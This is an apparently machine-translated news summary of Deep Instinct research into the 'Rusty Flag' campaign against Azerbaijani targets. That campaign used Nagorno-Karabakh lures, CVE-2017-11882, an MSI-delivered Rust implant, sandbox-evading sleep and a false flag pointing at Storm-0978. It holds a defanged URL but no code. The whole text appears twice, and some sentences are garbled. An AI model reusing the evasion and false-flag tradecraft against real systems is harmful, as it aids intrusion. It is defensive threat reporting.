Deep Instinct researchers have discovered an attacker targeting Azerbaijani targets using decoys related to the military conflict in Nagorno-Karabakh to infect their systems with new Rust-based malware.
The campaign was named Rusty Flag and had at least two different initial access vectors, and one of the lures was a modified document used by the Storm-0978 group.
But, as the researchers believe, this is more indicative of an attack under a false flag.
Initially, Deep Instinct detected a malicious LNK file with a low detection level called 1. KARABAKH. jpg.lnk and showing an image related to the military incident in Nagorno-Karabakh.
LNK downloads and runs the MSI installer hosted in DropBox, which contains the Rust-based implant, the scheduled task XML file, and the decoy image file.
Then another MSI file was found that already contained a different version of the same Rust implant, but it was more difficult to determine the initial access vector for this campaign.
The DropBox URL was masked using a URL shortening tool (hxxps://t[.]]ly/8CYQW).
Couldn't access the file Overview_of_UWCs_UkraineInNATO_campaign.docx, which sent a request to this URL.
Moreover, this file name and its contents were associated with the Storm-0978 campaign using CVE-2023-36884, which even had a corresponding comment on VirusTotal.
Upon further investigation, however, it turned out to be a different file. At the same time, the built-in afchunk. rtf was replaced, and the mentioned CVE was not used.
Instead, CVE-2017-11882 was exploited to download and install the MSI file. All this, according to the researchers, looks like a deliberate attempt to link the attack to Storm-0978.
Even though the original decoy was an office file, the delivered MSI also opened the decoy file in PDF format. Each attack had its own unique file names and metadata.
Although the original vectors were different, the execution in both variants was carried out in the same way. After executing the file, it went into sleep mode for 12 minutes. This is a well-known method to avoid security research and simple sandbox analysis.
Then I started collecting information about the infected machine. The information is then encrypted and sent to the attacker's server using an unusual, hard-coded port 35667.
Deep Instinct researchers were never able to attribute these attacks to any known attacker, and both Rust implants had 0 detections when first uploaded to VirusTotal.
So, someone's ongoing attempt to simulate cyber attacks on Azerbaijan by groups attributed to Russia might have had a chance of success at the moment, if not for Deep Instinct with its report.
But, as practice shows, sometimes they tend to turn into 404s, but for now-IOC and MITRE are in place in the report.
The campaign was named Rusty Flag and had at least two different initial access vectors, and one of the lures was a modified document used by the Storm-0978 group.
But, as the researchers believe, this is more indicative of an attack under a false flag.
Initially, Deep Instinct detected a malicious LNK file with a low detection level called 1. KARABAKH. jpg.lnk and showing an image related to the military incident in Nagorno-Karabakh.
LNK downloads and runs the MSI installer hosted in DropBox, which contains the Rust-based implant, the scheduled task XML file, and the decoy image file.
Then another MSI file was found that already contained a different version of the same Rust implant, but it was more difficult to determine the initial access vector for this campaign.
The DropBox URL was masked using a URL shortening tool (hxxps://t[.]]ly/8CYQW).
Couldn't access the file Overview_of_UWCs_UkraineInNATO_campaign.docx, which sent a request to this URL.
Moreover, this file name and its contents were associated with the Storm-0978 campaign using CVE-2023-36884, which even had a corresponding comment on VirusTotal.
Upon further investigation, however, it turned out to be a different file. At the same time, the built-in afchunk. rtf was replaced, and the mentioned CVE was not used.
Instead, CVE-2017-11882 was exploited to download and install the MSI file. All this, according to the researchers, looks like a deliberate attempt to link the attack to Storm-0978.
Even though the original decoy was an office file, the delivered MSI also opened the decoy file in PDF format. Each attack had its own unique file names and metadata.
Although the original vectors were different, the execution in both variants was carried out in the same way. After executing the file, it went into sleep mode for 12 minutes. This is a well-known method to avoid security research and simple sandbox analysis.
Then I started collecting information about the infected machine. The information is then encrypted and sent to the attacker's server using an unusual, hard-coded port 35667.
Deep Instinct researchers were never able to attribute these attacks to any known attacker, and both Rust implants had 0 detections when first uploaded to VirusTotal.
So, someone's ongoing attempt to simulate cyber attacks on Azerbaijan by groups attributed to Russia might have had a chance of success at the moment, if not for Deep Instinct with its report.
But, as practice shows, sometimes they tend to turn into 404s, but for now-IOC and MITRE are in place in the report.
